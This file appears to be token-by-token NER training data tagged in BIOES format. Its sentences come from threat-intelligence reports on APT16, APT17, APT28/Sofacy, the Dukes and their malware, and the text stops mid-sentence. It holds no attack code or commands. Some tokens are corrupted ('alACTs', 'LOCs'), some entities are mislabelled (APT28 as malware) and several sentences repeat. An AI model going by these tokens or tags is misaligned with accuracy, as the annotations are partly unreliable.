O + +Between O +November B-TIME +26 I-TIME +, I-TIME +2015 E-TIME +, O +and O +December B-TIME +1 I-TIME +, I-TIME +2015 E-TIME +, O +known O +and O +suspected O +China-based S-LOC +APT B-APT +groups E-APT +launched O +several O +spear B-ACT +phishing I-ACT +attacks E-ACT +targeting O +Japanese S-LOC +and O +Taiwanese S-LOC +organizations O +in O +the O +high-tech S-IDTY +, O +government B-IDTY +services E-IDTY +, O +media S-IDTY +and O +financial B-IDTY +services I-IDTY +industries E-IDTY +. O + +On O +November B-TIME +26 I-TIME +, I-TIME +2015 E-TIME +, O +a O +suspected O +China-based S-LOC +APT16 S-APT +sent O +Japanese S-LOC +defense O +policy-themed O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +multiple O +Japanese S-LOC +financial S-IDTY +and O +high-tech B-IDTY +companies E-IDTY +. O + +On O +November B-TIME +26 I-TIME +, I-TIME +2015 E-TIME +, O +a O +suspected O +China-based S-LOC +APT O +group O +sent O +Japanese S-LOC +defense O +policy-themed O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +multiple O +Japanese S-LOC +financial S-IDTY +and O +high-tech B-IDTY +companies E-IDTY +. O + +While O +attribution O +of O +the O +first O +two O +spear B-ACT +phishing I-ACT +attacks E-ACT +is O +still O +uncertain O +, O +we O +attribute O +the O +second O +December S-TIME +phishing B-ACT +campaign E-ACT +to O +the O +China-based S-LOC +APT O +group O +that O +we O +refer O +to O +as O +APT16 S-APT +. O + +APT16 B-APT +actors E-APT +sent O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +two O +Taiwanese S-LOC +media B-IDTY +organizations E-IDTY +. 
O + +On O +the O +same O +date O +that O +APT16 S-APT +targeted O +Taiwanese S-LOC +media S-IDTY +, O +suspected O +Chinese S-LOC +APT B-APT +actors E-APT +also O +targeted O +a O +Taiwanese S-LOC +government B-IDTY +agency E-IDTY +, O +sending O +a O +lure B-ACT +document E-ACT +that O +contained O +instructions O +for O +registration O +and O +subsequent O +listing O +of O +goods O +on O +a O +local O +Taiwanese S-LOC +auction O +website O +. O + +It O +is O +possible O +, O +although O +not O +confirmed O +, O +that O +APT16 S-APT +was O +also O +responsible O +for O +targeting O +this O +government B-IDTY +agency E-IDTY +, O +given O +both O +the O +timeframe O +and O +the O +use O +of O +the O +same O +n-day O +to O +eventually O +deploy O +the O +ELMER B-MAL +backdoor E-MAL +. O + +Despite O +the O +differing O +sponsorship O +, O +penetration O +of O +Hong B-LOC +Kong E-LOC +and O +Taiwan-based S-LOC +media B-IDTY +organizations E-IDTY +continues O +to O +be O +a O +priority O +for O +China-based S-LOC +APT16 S-APT +. O + +The O +suspected O +APT16 S-APT +targeting O +of O +the O +Taiwanese S-LOC +government B-IDTY +agency E-IDTY +– O +in O +addition O +to O +the O +Taiwanese S-LOC +media B-IDTY +organizations E-IDTY +– O +further O +supports O +this O +possibility O +. O + +APT17 S-APT +was O +embedding O +the O +encoded O +CnC O +IP S-PROT +address O +for O +the O +BLACKCOFFEE S-MAL +malware S-MAL +in O +legitimate O +Microsoft S-IDTY +TechNet O +profiles O +pages O +and O +forum O +threads O +, O +a O +method O +some O +in O +the O +information B-SECTEAM +security I-SECTEAM +community E-SECTEAM +call O +a O +" O +dead O +drop O +resolver O +" O +. O + +APT17 S-APT +, O +also O +known O +as O +DeputyDog S-APT +, O +is O +a O +China-based S-LOC +threat O +group O +that O +FireEye B-SECTEAM +Intelligence E-SECTEAM +has O +observed O +conducting O +network O +intrusions O +against O +U.S. 
S-LOC +government B-IDTY +entities E-IDTY +, O +the O +defense B-IDTY +industry E-IDTY +, O +law B-IDTY +firms E-IDTY +, O +information B-IDTY +technology I-IDTY +companies E-IDTY +, O +mining B-IDTY +companies E-IDTY +, O +and O +non-government B-IDTY +organizations E-IDTY +. O + +FireEye S-SECTEAM +has O +monitored O +APT17 S-APT +'s O +use O +of O +BLACKCOFFEE S-MAL +variants O +since O +2013 S-TIME +to O +masquerade O +malicious O +communication O +as O +normal O +web O +traffic O +by O +disguising O +the O +CnC O +communication O +as O +queries O +to O +web O +search O +engines O +. O + +The O +use O +of O +BLACKCOFFEE S-MAL +demonstrates O +APT17 S-APT +'s O +evolving O +use O +of O +public O +websites O +to O +hide O +in O +plain O +sight O +. O + +TG-0416 S-APT +is O +a O +stealthy O +and O +extremely O +successful O +Advanced O +Persistent O +Threat O +( O +APT O +) O +group O +known O +to O +target O +a O +broad O +range O +of O +verticals O +since O +at O +least O +2009 S-TIME +, O +including O +technology S-IDTY +, O +industrial S-IDTY +, O +manufacturing S-IDTY +, O +human B-IDTY +rights I-IDTY +groups E-IDTY +, O +government S-IDTY +, O +pharmaceutical S-IDTY +, O +and O +medical B-IDTY +technology E-IDTY +. O + +The O +APT18 S-APT +then O +installed O +the O +hcdLoader B-MAL +RAT E-MAL +, O +which O +installs O +as O +a O +Windows S-OS +service O +and O +provides O +command O +line O +access O +to O +the O +compromised O +system O +. O + +The O +malware O +used O +by O +the O +Wekby B-APT +group E-APT +has O +ties O +to O +the O +HTTPBrowser B-MAL +malware I-MAL +family E-MAL +, O +and O +uses O +DNS S-PROT +requests O +as O +a O +command O +and O +control O +mechanism O +. 
O + +These O +URIs O +result O +in O +the O +download O +of O +an O +installer O +, O +which O +creates O +a O +PE O +of O +the O +malware O +typically O +known O +as O +HTTPBrowser S-MAL +, O +but O +called O +Token B-MAL +Control E-MAL +by O +the O +Wekby B-APT +group E-APT +themselves O +( O +based O +upon O +the O +PDB S-TOOL +strings O +found O +within O +many O +of O +the O +samples O +) O +. O + +APT19 S-APT +seemed O +to O +be O +going O +after O +defense B-IDTY +sector I-IDTY +firms E-IDTY +, O +Chinese S-LOC +dissident O +groups O +and O +political S-IDTY +, O +financial S-IDTY +, O +pharmaceutical S-IDTY +and O +energy B-IDTY +sectors E-IDTY +that O +could O +benefit O +the O +Chinese S-LOC +economy O +. O + +APT19 S-APT +seemed O +to O +be O +going O +after O +defense B-IDTY +sector I-IDTY +firms E-IDTY +, O +Chinese S-LOC +dissident O +groups O +and O +other O +political S-IDTY +target O +, O +as O +well O +as O +certain O +financial S-IDTY +targets O +and O +other O +commercial S-IDTY +targets O +in O +pharmaceutical S-IDTY +and O +energy B-IDTY +sectors E-IDTY +that O +could O +benefit O +the O +Chinese S-LOC +economy O +. O + +FANCY B-APT +BEAR E-APT +( O +also O +known O +as O +Sofacy S-APT +or O +APT28 S-APT +) O +is O +a O +separate O +Russian-based S-LOC +threat O +actor O +, O +which O +has O +been O +active O +since O +mid B-TIME +2000s E-TIME +, O +and O +has O +been O +responsible O +for O +targeted O +intrusion B-ACT +campaigns E-ACT +against O +the O +Aerospace S-IDTY +, O +Defense S-IDTY +, O +Energy S-IDTY +, O +Government S-IDTY +and O +Media B-IDTY +sectors E-IDTY +. O + +APT28 S-MAL +malware S-MAL +, O +in O +particular O +the O +family O +of O +modular O +backdoors O +that O +we O +call O +CHOPSTICK S-MAL +, O +indicates O +a O +formal O +code O +development O +environment O +. 
O + +However O +, O +three O +themes O +in O +APT28 S-APT +'s O +targeting O +clearly O +reflects O +LOCs O +of O +specific O +interest O +to O +an O +Eastern B-LOC +European E-LOC +government S-IDTY +, O +most O +likely O +the O +Russian B-IDTY +government E-IDTY +. O + +We O +identified O +three O +themes O +in O +APT28 S-APT +'s O +lures O +and O +registered O +domains O +, O +which O +together O +are O +particularly O +relevant O +to O +the O +Russian B-IDTY +government E-IDTY +. O + +Georgian O +military O +security O +issues O +, O +particularly O +with O +regard O +to O +U.S. S-LOC +cooperation O +and O +NATO O +, O +provide O +a O +strong O +incentive O +for O +Russian S-LOC +state-sponsored O +threat O +actors S-APT +to O +steal O +information O +that O +sheds O +light O +on O +these O +topics O +. O + +Instead O +, O +we O +observed O +the O +two O +Russian S-LOC +espionage B-APT +groups E-APT +compromise O +the O +same O +systems O +and O +engage O +separately O +in O +the O +theft O +of O +identical O +credentials O +. O + +APT28 S-APT +'s O +malware O +settings O +suggest O +that O +the O +developers O +have O +done O +the O +majority O +of O +their O +work O +in O +a O +Russian S-LOC +language O +build O +environment O +during O +Russian S-LOC +business O +hours O +, O +which O +suggests O +that O +the O +Russian B-IDTY +government E-IDTY +is O +APT28 S-APT +'s O +sponsor O +. O + +We O +believe O +that O +APT28 S-APT +'s O +targeting O +of O +the O +MOD O +aligns O +with O +Russian S-LOC +threat O +perceptions O +. O + +We O +assess O +that O +APT28 S-APT +is O +most O +likely O +sponsored O +by O +the O +Russian B-IDTY +government E-IDTY +. O + +Given O +the O +available O +data O +, O +we O +assess O +that O +APT28 S-APT +'s O +work O +is O +sponsored O +by O +the O +Russian B-IDTY +government E-IDTY +. 
O + +The O +targets O +were O +similar O +to O +a O +2015 S-TIME +TG-4127 B-ACT +campaign E-ACT +— O +individuals O +in O +Russia S-LOC +and O +the O +former B-LOC +Soviet E-LOC +states O +, O +current O +and O +former O +military S-IDTY +and O +government B-IDTY +personnel E-IDTY +in O +the O +U.S. S-LOC +and O +Europe S-LOC +, O +individuals O +working O +in O +the O +defense S-IDTY +and O +government S-IDTY +supply O +chain O +, O +and O +authors S-IDTY +and O +journalists S-IDTY +— O +but O +also O +included O +email S-ACT +accounts O +linked O +to O +the O +November B-TIME +2016 E-TIME +United B-LOC +States E-LOC +presidential O +election O +. O + +The O +targets O +of O +TG-4127 S-APT +include O +military S-IDTY +, O +government S-IDTY +and O +defense B-IDTY +sectors E-IDTY +. O + +Some O +of O +APT28 S-APT +'s O +more O +commonly O +used O +tools O +are O +the O +SOURFACE B-MAL +downloader E-MAL +, O +its O +second O +stage O +backdoor O +EVILTOSS S-MAL +, O +and O +a O +modular B-MAL +family I-MAL +of I-MAL +implants E-MAL +that O +we O +call O +CHOPSTICK S-MAL +. O + +While O +TG-4127 S-APT +continues O +to O +primarily O +threaten O +organizations O +and O +individuals O +operating O +in O +Russia S-LOC +and O +former B-LOC +Soviet E-LOC +states O +, O +this O +campaign O +illustrates O +its O +willingness O +to O +expand O +its O +scope O +to O +other O +targets O +that O +have O +intelligence O +of O +interest O +to O +the O +Russian B-IDTY +government E-IDTY +. O + +CTU S-SECTEAM +researchers O +assess O +with O +moderate O +confidence O +that O +the O +group O +is O +operating O +from O +the O +Russian S-LOC +Federation O +and O +is O +gathering O +intelligence O +on O +behalf O +of O +the O +Russian B-IDTY +government E-IDTY +. 
O + +This O +intelligence O +has O +been O +critical O +to O +protecting O +and O +informing O +our O +clients O +, O +exposing O +this O +threat O +, O +and O +strengthening O +our O +confidence O +in O +attributing O +APT28 S-APT +to O +the O +Russian B-IDTY +government E-IDTY +. O + +Our O +visibility O +into O +the O +operations O +of O +APT28 S-APT +- O +a O +group O +we O +believe O +the O +Russian B-IDTY +government E-IDTY +sponsors O +- O +has O +given O +us O +insight O +into O +some O +of O +the O +government S-IDTY +'s O +targets O +, O +as O +well O +as O +its O +objectives O +and O +the O +activities S-ACT +designed O +to O +further O +them O +. O + +Since O +at O +least O +2007 S-TIME +, O +APT28 S-APT +has O +engaged O +in O +extensive O +operations O +in O +support O +of O +Russian S-LOC +strategic O +interests O +. O + +APT28 B-ACT +espionage I-ACT +activity E-ACT +has O +primarily O +targeted O +entities O +in O +the O +U.S. S-LOC +, O +Europe S-LOC +, O +and O +the O +countries O +of O +the O +former B-LOC +Soviet I-LOC +Union E-LOC +, O +including O +governments S-IDTY +, O +militaries S-IDTY +, O +defense B-IDTY +attaches E-IDTY +, O +media B-IDTY +entities E-IDTY +, O +and O +dissidents S-IDTY +and O +figures S-IDTY +opposed O +to O +the O +current O +Russian B-IDTY +government E-IDTY +. O + +APT28 B-ACT +espionage I-ACT +activity E-ACT +has O +primarily O +targeted O +entities O +in O +the O +U.S. S-LOC +, O +Europe S-LOC +, O +and O +the O +countries O +of O +the O +former B-LOC +Soviet I-LOC +Union E-LOC +, O +including O +governments S-IDTY +and O +militaries S-IDTY +, O +defense B-IDTY +attaches E-IDTY +, O +media B-IDTY +entities E-IDTY +, O +and O +dissidents S-IDTY +and O +figures S-IDTY +opposed O +to O +the O +current O +Russian B-IDTY +government E-IDTY +. 
O + +Over O +the O +past O +two O +years O +, O +Russia S-LOC +appears O +to O +have O +increasingly O +leveraged O +APT28 S-APT +to O +conduct O +information O +operations O +commensurate O +with O +broader O +strategic O +military O +doctrine O +. O + +After O +compromising O +a O +victim O +organization O +, O +APT28 S-APT +will O +steal O +internal O +data O +that O +is O +then O +leaked O +to O +further O +political O +narratives O +aligned O +with O +Russian S-LOC +interests O +. O + +After O +compromising O +a O +political B-IDTY +organization E-IDTY +, O +APT28 S-APT +will O +steal O +internal O +data O +. O + +On O +December B-TIME +29 I-TIME +, I-TIME +2016 E-TIME +, O +the O +Department B-SECTEAM +of I-SECTEAM +Homeland I-SECTEAM +Security E-SECTEAM +( O +DHS S-SECTEAM +) O +and O +Federal O +Bureau O +of O +Investigation O +( O +FBI S-SECTEAM +) O +released O +a O +Joint O +Analysis O +Report O +confirming O +FireEye S-SECTEAM +'s O +long O +held O +public O +assessment O +that O +the O +Russian B-IDTY +government E-IDTY +sponsors O +APT28 S-APT +. O + +In O +October B-TIME +2014 E-TIME +, O +FireEye S-SECTEAM +released O +APT28 S-APT +: O +A O +Window O +into O +Russia S-LOC +'s O +Cyber B-ACT +Espionage I-ACT +Operations E-ACT +, O +and O +characterized O +APT28 S-APT +'s O +activity O +as O +aligning O +with O +the O +Russian B-IDTY +government E-IDTY +'s O +strategic O +intelligence O +requirements O +. O + +In O +October B-TIME +2014 E-TIME +, O +FireEye S-SECTEAM +released O +APT28 S-APT +: O +A O +Window O +into O +Russia S-LOC +'s O +Cyber B-ACT +Espionage E-ACT +Operations' O +, O +and O +characterized O +APT28 S-APT +'s O +activity O +as O +aligning O +with O +the O +Russian B-IDTY +government E-IDTY +'s O +strategic O +intelligence O +requirements O +. O + +APT28 S-APT +targets O +Russian S-LOC +rockers S-IDTY +and O +dissidents B-IDTY +Pussy I-IDTY +Riot E-IDTY +via O +spear-phishing S-ACT +emails S-TOOL +. 
O + +Our O +investigation O +of O +APT28 S-APT +'s O +compromise O +of O +WADA S-IDTY +'s O +network O +, O +and O +our O +observations O +of O +the O +surrounding O +events O +reveal O +how O +Russia S-LOC +sought O +to O +counteract O +a O +damaging O +narrative O +and O +delegitimize O +the O +institutions O +leveling O +criticism O +. O + +Since O +releasing O +our O +2014 S-TIME +report O +, O +we O +continue O +to O +assess O +that O +APT28 S-APT +is O +sponsored O +by O +the O +Russian B-IDTY +government E-IDTY +. O + +In O +our O +2014 S-TIME +report O +, O +we O +identified O +APT28 S-APT +as O +a O +suspected O +Russian S-LOC +government-sponsored O +espionage S-ACT +actor O +. O + +For O +full O +details O +, O +please O +reference O +our O +2014 S-TIME +report O +, O +APT28 S-APT +: O +A O +Window O +into O +Russia S-LOC +'s O +Cyber B-ACT +Espionage I-ACT +Operations E-ACT +. O + +The O +espionage S-ACT +group O +, O +which O +according O +to O +the O +U.S. S-LOC +Department B-SECTEAM +of I-SECTEAM +Homeland I-SECTEAM +Security E-SECTEAM +( O +DHS S-SECTEAM +) O +and O +the O +Federal O +Bureau O +of O +Investigation O +( O +FBI S-SECTEAM +) O +is O +linked O +to O +the O +Russian B-IDTY +government E-IDTY +, O +returned O +to O +low-key O +intelligence-gathering O +operations O +during O +2017 S-TIME +and O +into O +2018 S-TIME +, O +targeting O +a O +range O +of O +military S-IDTY +and O +government S-IDTY +targets O +in O +Europe S-LOC +and O +South B-LOC +America E-LOC +. O + +The O +APT28 S-APT +, O +which O +is O +linked O +to O +the O +Russian B-IDTY +government E-IDTY +, O +returned O +to O +low-key O +intelligence-gathering O +operations O +during O +2017 S-TIME +and O +into O +2018 S-TIME +, O +targeting O +a O +range O +of O +military S-IDTY +and O +government S-IDTY +targets O +in O +Europe S-LOC +and O +South B-LOC +America E-LOC +. 
O + +Another O +attack O +group O +, O +Earworm S-APT +( O +aka O +Zebrocy S-APT +) O +, O +has O +been O +active O +since O +at O +least O +May B-TIME +2016 E-TIME +and O +is O +involved O +in O +what O +appears O +to O +be O +intelligence O +gathering O +operations O +against O +military O +targets O +in O +Europe S-LOC +, O +Central B-LOC +Asia E-LOC +, O +and O +Eastern B-LOC +Asia E-LOC +. O + +Several O +sources O +consider O +APT28 S-APT +a O +group O +of O +CyberMercs O +based O +in O +Russia S-LOC +. O + +The O +primary O +targets O +of O +APT28 S-APT +are O +potential O +victims O +in O +several O +countries O +such O +as O +Ukraine S-LOC +, O +Spain S-LOC +, O +Russia S-LOC +, O +Romania S-LOC +, O +the O +United B-LOC +States E-LOC +and O +Canada S-LOC +. O + +We O +have O +reasons O +to O +believe O +that O +the O +operators S-APT +of O +the O +APT28 S-APT +network O +are O +either O +Russian S-LOC +citizens S-IDTY +or O +citizens S-IDTY +of O +a O +neighboring O +country O +that O +speak O +Russian S-LOC +. O + +Previous O +work O +published O +by O +security O +vendor O +FireEye S-SECTEAM +in O +October B-TIME +2014 E-TIME +suggests O +the O +group O +might O +be O +of O +Russian S-LOC +origin O +. O + +Finally O +, O +the O +use O +of O +recent O +domestic O +events O +and O +a O +prominent O +US S-LOC +military S-IDTY +exercise O +focused O +on O +deterring O +Russian S-LOC +aggression O +highlight O +APT28 S-APT +'s O +ability O +and O +interest O +in O +exploiting O +geopolitical S-IDTY +events O +for O +their O +operations O +. O + +In O +2013 S-TIME +, O +the O +Sofacy B-APT +group E-APT +expanded O +their O +arsenal O +and O +added O +more O +backdoors O +and O +tools O +, O +including O +CORESHELL S-MAL +, O +SPLM S-MAL +, O +JHUHUGIT S-MAL +, O +AZZY S-MAL +and O +a O +few O +others O +. 
O + +In O +2013 S-TIME +, O +the O +Sofacy B-APT +group E-APT +expanded O +their O +arsenal O +and O +added O +more O +backdoors O +and O +tools O +, O +including O +CORESHELL S-MAL +, O +SPLM S-MAL +( O +aka O +Xagent S-MAL +, O +aka O +CHOPSTICK S-MAL +) O +, O +JHUHUGIT S-MAL +( O +which O +is O +built O +with O +code O +from O +the O +Carberp S-MAL +sources O +) O +, O +AZZY S-MAL +( O +aka O +ADVSTORESHELL O +, O +NETUI O +, O +EVILTOSS S-MAL +, O +and O +spans O +across O +4-5 O +generations O +) O +and O +a O +few O +others O +. O + +The O +Sofacy B-APT +group E-APT +spearphished O +targets O +in O +several O +waves O +with O +Flash S-TOOL +exploits S-VULNAME +leading O +to O +their O +Carberp S-MAL +based O +JHUHUGIT B-MAL +downloaders E-MAL +and O +further O +stages O +of O +malware O +. O + +APT28 S-APT +spearphished O +targets O +in O +several O +waves O +with O +Flash S-TOOL +exploits S-VULNAME +leading O +to O +their O +Carberp S-MAL +based O +JHUHUGIT B-MAL +downloaders E-MAL +and O +further O +stages O +of O +malware O +. O + +The O +group O +spearphished O +targets O +in O +several O +waves O +with O +Flash S-TOOL +exploits S-VULNAME +leading O +to O +their O +Carberp S-MAL +based O +JHUHUGIT B-MAL +downloaders E-MAL +and O +further O +stages O +of O +malware O +. O + +Their O +evolving O +and O +modified O +SPLM S-MAL +, O +CHOPSTICK S-MAL +, O +XAgent S-MAL +code O +is O +a O +long-standing O +part O +of O +Sofacy B-ACT +activity E-ACT +, O +however O +much O +of O +it O +is O +changing O +. O + +FireEye S-SECTEAM +has O +moderate O +confidence O +that O +a O +campaign O +targeting O +the O +hospitality B-IDTY +sector E-IDTY +is O +attributed O +to O +Russian S-LOC +actor B-APT +APT28 E-APT +. 
O + +APT28 S-APT +is O +using O +novel O +techniques O +involving O +the O +EternalBlue S-VULNAME +exploits S-VULNAME +and O +the O +open B-MAL +source I-MAL +tool E-MAL +Responder S-MAL +to O +spread O +laterally O +through O +networks O +and O +likely O +target O +travelers O +. O + +Upon O +gaining O +access O +to O +the O +machines O +connected O +to O +corporate O +and O +guest O +Wi-Fi O +networks O +, O +APT28 S-APT +deployed O +Responder S-MAL +. O + +Compared O +to O +other O +backdoor B-MAL +tools E-MAL +associated O +with O +the O +Sofacy B-APT +group E-APT +, O +the O +use O +of O +Zebrocy S-MAL +in O +attack B-ACT +campaigns E-ACT +is O +far O +more O +widespread O +. O + +As O +alluded O +to O +in O +our O +previous O +blog O +regarding O +the O +Cannon B-MAL +tool E-MAL +, O +the O +Sofacy B-APT +group E-APT +( O +AKA O +Fancy B-APT +Bear E-APT +, O +APT28 S-APT +, O +STRONTIUM S-APT +, O +Pawn B-APT +Storm E-APT +, O +Sednit S-APT +) O +has O +persistently O +attacked O +various O +government S-IDTY +and O +private O +organizations O +around O +the O +world O +from O +mid-October B-TIME +2018 E-TIME +through O +mid-November B-TIME +2018 E-TIME +. O + +Russian S-LOC +citizens—journalists S-IDTY +, O +software B-IDTY +developers E-IDTY +, O +politicians S-IDTY +, O +researchers B-IDTY +at I-IDTY +universities E-IDTY +, O +and O +artists S-IDTY +are O +also O +targeted O +by O +Pawn B-APT +Storm E-APT +. O + +The O +JHUHUGIT S-MAL +implant O +became O +a O +relatively O +popular O +first O +stage O +for O +the O +Sofacy B-ACT +attacks E-ACT +and O +was O +used O +again O +with O +a O +Java S-TOOL +zero-day S-VULNAME +( O +CVE-2015-2590 S-VULID +) O +in O +July B-TIME +2015 E-TIME +. 
O + +While O +the O +JHUHUGIT S-MAL +( O +and O +more O +recently O +, O +" O +JKEYSKW S-MAL +" O +) O +implant O +used O +in O +most O +of O +the O +Sofacy B-ACT +attacks E-ACT +, O +high O +profile O +victims O +are O +being O +targeted O +with O +another O +first O +level O +implant O +, O +representing O +the O +latest O +evolution O +of O +their O +AZZY B-MAL +Trojan E-MAL +. O + +Once O +a O +foothold O +is O +established O +, O +Sofacy S-APT +trys O +to O +upload O +more O +backdoors S-MAL +, O +USB B-MAL +stealers E-MAL +as O +well O +as O +other O +hacking O +tools O +such O +as O +" O +Mimikatz S-MAL +" O +for O +lateral O +movement O +. O + +Once O +a O +foothold O +is O +established O +, O +they O +try O +to O +upload O +more O +backdoors S-MAL +, O +USB B-MAL +stealers E-MAL +as O +well O +as O +other O +hacking O +tools O +such O +as O +" O +Mimikatz S-MAL +" O +for O +lateral O +movement O +. O + +The O +Sofacy B-APT +threat I-APT +group E-APT +continues O +to O +target O +government B-IDTY +organizations E-IDTY +in O +the O +EU S-LOC +, O +US S-LOC +, O +and O +former B-LOC +Soviet E-LOC +states O +to O +deliver O +the O +Zebrocy B-MAL +tool E-MAL +as O +a O +payload O +. O + +Of O +note O +, O +we O +also O +discovered O +the O +Sofacy B-APT +group E-APT +using O +a O +very O +similar O +delivery O +document O +to O +deliver O +a O +new O +Trojan S-MAL +called O +Cannon S-MAL +. O + +Komplex S-MAL +shares O +a O +significant O +amount O +of O +functionality O +and O +traits O +with O +another O +tool O +used O +by O +Sofacy S-APT +– O +the O +Carberp S-MAL +variant O +that O +Sofacy S-APT +had O +used O +in O +previous O +attack B-ACT +campaigns E-ACT +on O +systems O +running O +Windows S-OS +. 
O + +The O +Sofacy B-APT +group E-APT +created O +the O +Komplex B-MAL +Trojan E-MAL +to O +use O +in O +attack B-ACT +campaigns E-ACT +targeting O +the O +OS O +X O +operating O +system O +– O +a O +move O +that O +showcases O +their O +continued O +evolution O +toward O +multi-platform O +attacks O +. O + +The O +Komplex B-MAL +Trojan E-MAL +revealed O +a O +design O +similar O +to O +Sofacy S-APT +'s O +Carberp S-MAL +variant O +Trojan S-MAL +, O +which O +we O +believe O +may O +have O +been O +done O +in O +order O +to O +handle O +compromised O +Windows S-OS +and O +OS O +X O +systems O +using O +the O +same O +C2 S-TOOL +server O +application O +with O +relative O +ease O +. O + +This O +whitepaper O +explores O +the O +tools O +- O +such O +as O +MiniDuke S-MAL +, O +CosmicDuke S-MAL +, O +OnionDuke S-MAL +, O +CozyDuke S-MAL +, O +etc- O +of O +the O +Dukes S-APT +, O +a O +well-resourced O +, O +highly O +dedicated O +and O +organized O +cyberespionage S-ACT +group O +that O +we O +believe O +has O +been O +working O +for O +the O +Russian S-LOC +Federation O +since O +at O +least O +2008 S-TIME +to O +collect O +intelligence O +in O +support O +of O +foreign O +and O +security O +policy O +decision-making O +. O + +The O +Dukes S-APT +are O +a O +well-resourced O +, O +highly O +dedicated O +and O +organized O +cyberespionage S-ACT +group O +that O +we O +believe O +has O +been O +working O +for O +the O +Russian S-LOC +Federation O +since O +at O +least O +2008 S-TIME +to O +collect O +intelligence O +in O +support O +of O +foreign O +and O +security O +policy O +decision-making O +. O + +The O +Dukes S-APT +are O +known O +to O +employ O +a O +vast O +arsenal O +of O +malware O +toolsets O +, O +which O +we O +identify O +as O +MiniDuke S-MAL +, O +CosmicDuke S-MAL +, O +OnionDuke S-MAL +, O +CozyDuke S-MAL +, O +CloudDuke S-MAL +, O +SeaDuke S-MAL +, O +HammerDuke S-MAL +, O +PinchDuke S-MAL +, O +and O +GeminiDuke S-MAL +. 
O + +The O +origins O +of O +the O +Duke O +toolset O +names O +can O +be O +traced O +back O +to O +when O +researchers O +at O +Kaspersky B-SECTEAM +Labs E-SECTEAM +coined O +the O +term O +" O +MiniDuke S-MAL +" O +to O +identify O +the O +first O +Duke-related S-MAL +malware S-MAL +they O +found O +. O + +As O +researchers O +continued O +discovering O +new O +toolsets O +that O +were O +created O +and O +used O +by O +the O +same O +group O +that O +had O +been O +operating O +MiniDuke S-MAL +, O +and O +thus O +the O +threat O +actor O +operating O +the O +toolsets O +started O +to O +be O +commonly O +referred O +to O +as O +" O +Dukes S-APT +" O +. O + +Based O +on O +the O +campaign O +identifiers O +found O +in O +PinchDuke B-MAL +samples E-MAL +discovered O +from O +2009 S-TIME +, O +the O +targets O +of O +the O +Dukes B-APT +group E-APT +during O +that O +year O +included O +organizations O +such O +as O +the O +Ministry B-IDTY +of I-IDTY +Defense E-IDTY +of O +Georgia O +and O +the O +ministries B-IDTY +of I-IDTY +foreign I-IDTY +affairs E-IDTY +of O +Turkey S-LOC +and O +Uganda S-LOC +. O + +Importantly O +, O +PinchDuke B-MAL +trojan I-MAL +samples E-MAL +alACTs O +contain O +a O +notable O +text O +string O +, O +which O +we O +believe O +is O +used O +as O +a O +campaign O +identifier O +by O +the O +Dukes B-APT +group E-APT +to O +distinguish O +between O +multiple O +attack B-ACT +campaigns E-ACT +that O +are O +run O +in O +parallel O +. O + +This O +neatly O +ties O +together O +many O +of O +the O +tools O +used O +by O +the O +Dukes B-APT +group E-APT +, O +as O +versions O +of O +this O +one O +loader O +have O +been O +used O +to O +load O +malware O +from O +three O +different O +Dukes-related O +toolsets O +CosmicDuke S-MAL +, O +PinchDuke S-MAL +, O +and O +MiniDuke S-MAL +– O +over O +the O +course O +of O +five O +years O +. 
O + +The O +Dukes S-APT +continued O +the O +expansion O +of O +their O +arsenal O +in O +2011 S-TIME +with O +the O +addition O +of O +two O +more O +toolsets O +: O +MiniDuke S-MAL +and O +CozyDuke S-MAL +. O + +As O +we O +now O +know O +, O +by O +February B-TIME +2013 E-TIME +the O +Dukes B-APT +group E-APT +had O +been O +operating O +MiniDuke S-MAL +and O +other O +toolsets O +for O +at O +least O +4 O +and O +a O +half O +years O +. O + +Secondly O +, O +the O +value O +the O +Dukes S-APT +intended O +to O +gain O +from O +these O +MiniDuke B-ACT +campaigns E-ACT +may O +have O +been O +so O +great O +that O +they O +deemed O +it O +worth O +the O +risk O +of O +getting O +noticed O +. O + +This O +is O +in O +stark O +contrast O +to O +some O +other O +suspected O +Russian S-LOC +threat O +actors S-APT +( O +such O +as O +Operation B-ACT +Pawn I-ACT +Storm E-ACT +) O +who O +appear O +to O +have O +increased O +their O +targeting O +of O +Ukraine S-LOC +following O +the O +crisis O +. O + +The O +Dukes S-APT +actively O +targeted O +Ukraine S-LOC +before O +the O +crisis O +, O +at O +a O +time O +when O +Russia S-LOC +was O +still O +weighing O +her O +options O +, O +but O +once O +Russia S-LOC +moved O +from O +diplomacy O +to O +direct O +action O +, O +Ukraine S-LOC +was O +no O +longer O +relevant O +to O +the O +Dukes S-APT +in O +the O +same O +ACT O +. O + +In O +the O +latter O +case O +however O +, O +the O +Dukes B-APT +group E-APT +appear O +to O +have O +also O +simultaneously O +developed O +an O +entirely O +new O +loader O +, O +which O +we O +first O +observed O +being O +used O +in O +conjunction O +with O +CosmicDuke S-MAL +during O +the O +spring B-TIME +of I-TIME +2015 E-TIME +. 
O + +The O +Dukes S-APT +could O +have O +ceased O +all O +use O +of O +CosmicDuke S-MAL +( O +at O +least O +until O +they O +had O +developed O +a O +new O +loader O +) O +or O +retired O +it O +entirely O +, O +since O +they O +still O +had O +other O +toolsets O +available O +. O + +For O +these O +CozyDuke B-ACT +campaigns E-ACT +however O +, O +the O +Dukes S-APT +appear O +to O +have O +employed O +two O +particular O +later-stage O +toolsets O +, O +SeaDuke S-MAL +and O +HammerDuke S-MAL +. O + +Firstly O +, O +as O +with O +the O +MiniDuke B-ACT +campaigns E-ACT +of O +February B-TIME +2013 E-TIME +and O +CosmicDuke B-ACT +campaigns E-ACT +in O +the O +summer B-TIME +of I-TIME +2014 E-TIME +, O +again O +the O +group O +clearly O +prioritized O +the O +continuation O +of O +their O +operations O +over O +maintaining O +stealth O +. O + +In O +addition O +to O +the O +notably O +overt O +and O +large-scale O +campaigns S-ACT +with O +CozyDuke S-ACT +and O +CloudDuke S-ACT +, O +the O +Dukes S-APT +also O +continued O +to O +engage O +in O +more O +covert O +, O +surgical O +campaigns S-ACT +using O +CosmicDuke S-MAL +. O + +We O +are O +however O +only O +aware O +of O +one O +instance O +- O +the O +exploitation O +of O +CVE-2013-0640 S-VULID +to O +deploy O +MiniDuke S-MAL +- O +where O +we O +believe O +the O +exploited O +vulnerability O +was O +a O +zero-day S-VULNAME +at O +the O +time O +that O +the O +group O +acquired O +the O +exploit S-VULNAME +. O + +All O +of O +the O +available O +evidence O +however O +does O +in O +our O +opinion O +suggest O +that O +the O +group O +operates O +on O +behalf O +of O +the O 